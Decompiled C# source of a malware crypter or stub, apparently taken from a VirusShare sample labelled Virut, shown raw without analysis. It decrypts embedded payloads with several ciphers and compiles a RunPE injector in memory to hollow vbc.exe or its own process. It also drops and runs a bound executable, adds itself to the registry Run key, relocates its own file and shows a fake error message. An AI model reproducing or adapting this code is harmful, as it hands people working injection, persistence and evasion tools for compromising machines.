// Decompiled with JetBrains decompiler // Type: fjYIWqNzRsrEuPM // Assembly: 3, Version=830.23.182.254, Culture=neutral, PublicKeyToken=null // MVID: 3AB55594-508F-4214-AA1C-DD579280B133 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Virut.ce-c41c86f44216c3054b1e45e53e91cc0e9df01ff509ab0ed824899d4e8d19800d.exe using Microsoft.VisualBasic; using Microsoft.VisualBasic.CompilerServices; using Microsoft.Win32; using System; using System.CodeDom.Compiler; using System.Diagnostics; using System.IO; using System.Net.NetworkInformation; using System.Reflection; using System.Resources; using System.Runtime.InteropServices; using System.Security.Cryptography; using System.Text; using System.Threading; using System.Windows.Forms; [StandardModule] internal sealed class fjYIWqNzRsrEuPM { public static string yqtchzIOqOKBrSD; public static string lJwYYoItFcgpqET; [STAThread] public static void Main() { char ch = '%'; ResourceManager resourceManager = new ResourceManager("TempRes", Assembly.GetExecutingAssembly()); Encoding encoding = Encoding.Default; string str1 = resourceManager.GetString("crypted"); string str2 = resourceManager.GetString("settings"); fjYIWqNzRsrEuPM.yqtchzIOqOKBrSD = resourceManager.GetString("bind"); fjYIWqNzRsrEuPM.lJwYYoItFcgpqET = resourceManager.GetString("runpe"); string[] strArray = str2.Split(ch); string str3 = strArray[2]; string Left1 = strArray[1]; string Left2 = strArray[4]; string Left3 = strArray[5]; string Left4 = strArray[3]; string Left5 = strArray[11]; string Left6 = strArray[6]; if (Operators.CompareString(strArray[10], "1", false) == 0) fjYIWqNzRsrEuPM.aXQMuDulpbuaEay(); if (Operators.CompareString(Left4, "1", false) == 0) Daanteys.Enable(); if (Operators.CompareString(Left3, "1", false) == 0) new Thread(new ThreadStart(fjYIWqNzRsrEuPM.mMBTPviKNdprvRd)) { IsBackground = true }.Start(); if (Environment.OSVersion.Platform.ToString().Contains("32") || Environment.OSVersion.Platform.ToString().Contains("86")) { if (Operators.CompareString(Left1, "RC4", false) == 0) fjYIWqNzRsrEuPM.roKWNVYxmxtHPPs(fjYIWqNzRsrEuPM.lJwYYoItFcgpqET.Replace("%%40%%", CD.format(fjYIWqNzRsrEuPM.YkqdEiNjkYEcGHU(str1, str3))).Replace("%%42%%", Application.ExecutablePath)); else if (Operators.CompareString(Left1, "AES", false) == 0) fjYIWqNzRsrEuPM.roKWNVYxmxtHPPs(fjYIWqNzRsrEuPM.lJwYYoItFcgpqET.Replace("%%40%%", CD.format(fjYIWqNzRsrEuPM.PhCrUkyjFEeSSOb(str1, str3))).Replace("%%42%%", Application.ExecutablePath)); else if (Operators.CompareString(Left1, "DES", false) == 0) fjYIWqNzRsrEuPM.roKWNVYxmxtHPPs(fjYIWqNzRsrEuPM.lJwYYoItFcgpqET.Replace("%%40%%", CD.format(fjYIWqNzRsrEuPM.DfrVzRBLTZVYiTu(str1, str3))).Replace("%%42%%", Application.ExecutablePath)); else if (Operators.CompareString(Left1, "RC2", false) == 0) fjYIWqNzRsrEuPM.roKWNVYxmxtHPPs(fjYIWqNzRsrEuPM.lJwYYoItFcgpqET.Replace("%%40%%", CD.format(fjYIWqNzRsrEuPM.VhCqeEsmyAGjexn(str1, str3))).Replace("%%42%%", Application.ExecutablePath)); else if (Operators.CompareString(Left1, "STR", false) == 0) fjYIWqNzRsrEuPM.roKWNVYxmxtHPPs(fjYIWqNzRsrEuPM.lJwYYoItFcgpqET.Replace("%%40%%", CD.format(fjYIWqNzRsrEuPM.ghWPuuObTVRPWrY(str1, str3))).Replace("%%42%%", Application.ExecutablePath)); else if (Operators.CompareString(Left1, "XOR", false) == 0) fjYIWqNzRsrEuPM.roKWNVYxmxtHPPs(fjYIWqNzRsrEuPM.lJwYYoItFcgpqET.Replace("%%40%%", CD.format(fjYIWqNzRsrEuPM.ZHfmltHRHxetfJW(str1, str3))).Replace("%%42%%", Application.ExecutablePath)); else if (Operators.CompareString(Left1, "TDES", false) == 0) fjYIWqNzRsrEuPM.roKWNVYxmxtHPPs(fjYIWqNzRsrEuPM.lJwYYoItFcgpqET.Replace("%%40%%", CD.format(fjYIWqNzRsrEuPM.uwffzkjdFvQZybM(str1, str3))).Replace("%%42%%", Application.ExecutablePath)); } else if (Operators.CompareString(Left1, "RC4", false) == 0) fjYIWqNzRsrEuPM.roKWNVYxmxtHPPs(fjYIWqNzRsrEuPM.lJwYYoItFcgpqET.Replace("%%40%%", CD.format(fjYIWqNzRsrEuPM.YkqdEiNjkYEcGHU(str1, str3))).Replace("%%42%%", Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") + "Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe")); else if (Operators.CompareString(Left1, "AES", false) == 0) fjYIWqNzRsrEuPM.roKWNVYxmxtHPPs(fjYIWqNzRsrEuPM.lJwYYoItFcgpqET.Replace("%%40%%", CD.format(fjYIWqNzRsrEuPM.PhCrUkyjFEeSSOb(str1, str3))).Replace("%%42%%", Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") + "Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe")); else if (Operators.CompareString(Left1, "DES", false) == 0) fjYIWqNzRsrEuPM.roKWNVYxmxtHPPs(fjYIWqNzRsrEuPM.lJwYYoItFcgpqET.Replace("%%40%%", CD.format(fjYIWqNzRsrEuPM.DfrVzRBLTZVYiTu(str1, str3))).Replace("%%42%%", Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") + "Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe")); else if (Operators.CompareString(Left1, "RC2", false) == 0) fjYIWqNzRsrEuPM.roKWNVYxmxtHPPs(fjYIWqNzRsrEuPM.lJwYYoItFcgpqET.Replace("%%40%%", CD.format(fjYIWqNzRsrEuPM.VhCqeEsmyAGjexn(str1, str3))).Replace("%%42%%", Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") + "Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe")); else if (Operators.CompareString(Left1, "STR", false) == 0) fjYIWqNzRsrEuPM.roKWNVYxmxtHPPs(fjYIWqNzRsrEuPM.lJwYYoItFcgpqET.Replace("%%40%%", CD.format(fjYIWqNzRsrEuPM.ghWPuuObTVRPWrY(str1, str3))).Replace("%%42%%", Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") + "Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe")); else if (Operators.CompareString(Left1, "XOR", false) == 0) fjYIWqNzRsrEuPM.roKWNVYxmxtHPPs(fjYIWqNzRsrEuPM.lJwYYoItFcgpqET.Replace("%%40%%", CD.format(fjYIWqNzRsrEuPM.ZHfmltHRHxetfJW(str1, str3))).Replace("%%42%%", Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") + "Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe")); else if (Operators.CompareString(Left1, "TDES", false) == 0) fjYIWqNzRsrEuPM.roKWNVYxmxtHPPs(fjYIWqNzRsrEuPM.lJwYYoItFcgpqET.Replace("%%40%%", CD.format(fjYIWqNzRsrEuPM.uwffzkjdFvQZybM(str1, str3))).Replace("%%42%%", Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") + "Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe")); if (Operators.CompareString(Left2, "1", false) == 0) fjYIWqNzRsrEuPM.qfiZEWBAVDVcXYV(); if (Operators.CompareString(Left6, "1", false) == 0) { string Left7 = strArray[7]; if (Operators.CompareString(Left7, "", false) == 0) { int num1 = (int) Interaction.MsgBox((object) strArray[8], MsgBoxStyle.Critical, (object) strArray[9]); } else if (Operators.CompareString(Left7, "Exclamation", false) == 0) { int num2 = (int) Interaction.MsgBox((object) strArray[8], MsgBoxStyle.Exclamation, (object) strArray[9]); } else if (Operators.CompareString(Left7, "Critical", false) == 0) { int num3 = (int) Interaction.MsgBox((object) strArray[8], MsgBoxStyle.Critical, (object) strArray[9]); } else if (Operators.CompareString(Left7, "Question", false) == 0) { int num4 = (int) Interaction.MsgBox((object) strArray[8], MsgBoxStyle.Question, (object) strArray[9]); } else if (Operators.CompareString(Left7, "Information", false) == 0) { int num5 = (int) Interaction.MsgBox((object) strArray[8], MsgBoxStyle.Information, (object) strArray[9]); } } if (Operators.CompareString(Left5, "1", false) != 0) return; fjYIWqNzRsrEuPM.coFIciVHjFSurZy(); } public static void mMBTPviKNdprvRd() { File.WriteAllBytes(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "/temp.exe", Convert.FromBase64String(fjYIWqNzRsrEuPM.yqtchzIOqOKBrSD)); Process.Start(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "/temp.exe"); } public static void roKWNVYxmxtHPPs(string source) { CompilerResults compilerResults = new VBCodeProvider().CompileAssemblyFromSource(new CompilerParameters() { GenerateExecutable = false, GenerateInMemory = true }, source); if (compilerResults.Errors.Count > 0) return; compilerResults.CompiledAssembly.GetType("Inject.RunPE").GetMethod("InjectPE").Invoke((object) null, (object[]) null); } public static string PhCrUkyjFEeSSOb(string input, string pass) { RijndaelManaged rijndaelManaged = new RijndaelManaged(); MD5CryptoServiceProvider cryptoServiceProvider = new MD5CryptoServiceProvider(); string str; try { byte[] destinationArray = new byte[32]; byte[] hash = cryptoServiceProvider.ComputeHash(Encoding.ASCII.GetBytes(pass)); Array.Copy((Array) hash, 0, (Array) destinationArray, 0, 16); Array.Copy((Array) hash, 0, (Array) destinationArray, 15, 16); rijndaelManaged.Key = destinationArray; rijndaelManaged.Mode = CipherMode.ECB; ICryptoTransform decryptor = rijndaelManaged.CreateDecryptor(); byte[] inputBuffer = Convert.FromBase64String(input); str = Encoding.ASCII.GetString(decryptor.TransformFinalBlock(inputBuffer, 0, inputBuffer.Length)); } catch (Exception ex) { ProjectData.SetProjectError(ex); str = ""; ProjectData.ClearProjectError(); } return str; } public static string YkqdEiNjkYEcGHU(string message, string password) { message = Encoding.Default.GetString(Convert.FromBase64String(message)); int index1 = 0; int index2 = 0; StringBuilder stringBuilder = new StringBuilder(); string empty = string.Empty; int[] numArray1 = new int[257]; int[] numArray2 = new int[257]; int length = password.Length; int location1 = 0; while (location1 <= (int) byte.MaxValue) { char String = password.Substring(location1 % length, 1).ToCharArray()[0]; numArray2[location1] = Strings.Asc(String); numArray1[location1] = location1; Math.Max(Interlocked.Increment(ref location1), checked (location1 - 1)); } int index3 = 0; int location2 = 0; while (location2 <= (int) byte.MaxValue) { index3 = checked (index3 + numArray1[location2] + numArray2[location2]) % 256; int num = numArray1[location2]; numArray1[location2] = numArray1[index3]; numArray1[index3] = num; Math.Max(Interlocked.Increment(ref location2), checked (location2 - 1)); } int location3 = 1; while (location3 <= message.Length) { index1 = checked (index1 + 1) % 256; index2 = checked (index2 + numArray1[index1]) % 256; int num1 = numArray1[index1]; numArray1[index1] = numArray1[index2]; numArray1[index2] = num1; int num2 = numArray1[checked (numArray1[index1] + numArray1[index2]) % 256]; int CharCode = Strings.Asc(message.Substring(checked (location3 - 1), 1).ToCharArray()[0]) ^ num2; stringBuilder.Append(Strings.Chr(CharCode)); Math.Max(Interlocked.Increment(ref location3), checked (location3 - 1)); } string str = stringBuilder.ToString(); stringBuilder.Length = 0; return str; } public static string ZHfmltHRHxetfJW(string Input, string pass) { StringBuilder stringBuilder = new StringBuilder(); int num = checked (Input.Length - 1); int startIndex = 0; while (startIndex <= num) { int index; string str = Conversions.ToString(Strings.Chr(checked ((int) (Conversions.ToLong("&H" + Input.Substring(startIndex, 2)) ^ (long) Strings.Asc(pass[index]))))); stringBuilder.Append(str); if (index == checked (pass.Length - 1)) index = 0; else checked { ++index; } checked { startIndex += 2; } } return stringBuilder.ToString(); } public static string uwffzkjdFvQZybM(string input, string pass) { TripleDESCryptoServiceProvider cryptoServiceProvider1 = new TripleDESCryptoServiceProvider(); MD5CryptoServiceProvider cryptoServiceProvider2 = new MD5CryptoServiceProvider(); string str; try { byte[] destinationArray = new byte[24]; byte[] hash = cryptoServiceProvider2.ComputeHash(Encoding.ASCII.GetBytes(pass)); Array.Copy((Array) hash, 0, (Array) destinationArray, 0, 16); Array.Copy((Array) hash, 0, (Array) destinationArray, 15, 8); cryptoServiceProvider1.Key = destinationArray; cryptoServiceProvider1.Mode = CipherMode.ECB; ICryptoTransform decryptor = cryptoServiceProvider1.CreateDecryptor(); byte[] inputBuffer = Convert.FromBase64String(input); str = Encoding.ASCII.GetString(decryptor.TransformFinalBlock(inputBuffer, 0, inputBuffer.Length)); } catch (Exception ex) { ProjectData.SetProjectError(ex); str = ""; ProjectData.ClearProjectError(); } return str; } public static string ghWPuuObTVRPWrY(string Data, string key) => Encoding.Default.GetString(fjYIWqNzRsrEuPM.ghWPuuObTVRPWrY(Encoding.Default.GetBytes(Data), Encoding.Default.GetBytes(key))); public static byte[] ghWPuuObTVRPWrY(byte[] Data, byte[] key) { int index = checked (Data.Length - 1); while (index >= 0) { Data[index] = checked ((byte) unchecked (checked (((int) Data[index] ^ (int) key[unchecked (index % key.Length)]) - (int) Data[unchecked (checked (index + 1) % Data.Length)] + 256) % 256)); checked { index += -1; } } return Data; } public static string VhCqeEsmyAGjexn(string input, string pass) { RC2CryptoServiceProvider cryptoServiceProvider1 = new RC2CryptoServiceProvider(); MD5CryptoServiceProvider cryptoServiceProvider2 = new MD5CryptoServiceProvider(); string str; try { byte[] hash = cryptoServiceProvider2.ComputeHash(Encoding.ASCII.GetBytes(pass)); cryptoServiceProvider1.Key = hash; cryptoServiceProvider1.Mode = CipherMode.ECB; ICryptoTransform decryptor = cryptoServiceProvider1.CreateDecryptor(); byte[] inputBuffer = Convert.FromBase64String(input); str = Encoding.ASCII.GetString(decryptor.TransformFinalBlock(inputBuffer, 0, inputBuffer.Length)); } catch (Exception ex) { ProjectData.SetProjectError(ex); str = ""; ProjectData.ClearProjectError(); } return str; } public static string DfrVzRBLTZVYiTu(string input, string pass) { DESCryptoServiceProvider cryptoServiceProvider1 = new DESCryptoServiceProvider(); MD5CryptoServiceProvider cryptoServiceProvider2 = new MD5CryptoServiceProvider(); string str; try { byte[] destinationArray = new byte[8]; Array.Copy((Array) cryptoServiceProvider2.ComputeHash(Encoding.ASCII.GetBytes(pass)), 0, (Array) destinationArray, 0, 8); cryptoServiceProvider1.Key = destinationArray; cryptoServiceProvider1.Mode = CipherMode.ECB; ICryptoTransform decryptor = cryptoServiceProvider1.CreateDecryptor(); byte[] inputBuffer = Convert.FromBase64String(input); str = Encoding.ASCII.GetString(decryptor.TransformFinalBlock(inputBuffer, 0, inputBuffer.Length)); } catch (Exception ex) { ProjectData.SetProjectError(ex); str = ""; ProjectData.ClearProjectError(); } return str; } public static void qfiZEWBAVDVcXYV() { try { File.Copy(Application.ExecutablePath, Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\jseEiuRiWjuDNIfRFtRiZFMfRFr.exe"); RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true); if (registryKey.GetValue(Application.ProductName) == null) registryKey.SetValue(Application.ProductName, (object) (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\jseEiuRiWjuDNIfRFtRiZFMfRFr.exe")); registryKey.Close(); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } } [DllImport("kernel32", EntryPoint = "GetModuleFileNameA", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int GetModuleFileName(int hModule, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpFileName, int nSize); [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int ExitProcess(uint uExitCode); [DllImport("kernel32", EntryPoint = "MoveFileExW", CharSet = CharSet.Ansi, SetLastError = true)] public static extern int MoveFile([MarshalAs(UnmanagedType.LPTStr), In] string lpExistingFileName, [MarshalAs(UnmanagedType.LPTStr), In] string lpNewFileName, long dwFlags); public static void coFIciVHjFSurZy() { string executablePath1 = Application.ExecutablePath; string executablePath2 = Application.ExecutablePath; int moduleFileName = fjYIWqNzRsrEuPM.GetModuleFileName(0, ref executablePath2, 256); fjYIWqNzRsrEuPM.MoveFile(Strings.Left(executablePath1, moduleFileName), Path.GetTempPath() + "\\tmpG" + DateTime.Now.Millisecond.ToString() + ".tmp", 8L); fjYIWqNzRsrEuPM.ExitProcess(0U); } public static void aXQMuDulpbuaEay() { if (NetworkInterface.GetIsNetworkAvailable()) return; int num = (int) Interaction.MsgBox((object) "You need an Internet Connection to run this programm !", Title: ((object) "Microsoft Windows")); Environment.Exit(0); } }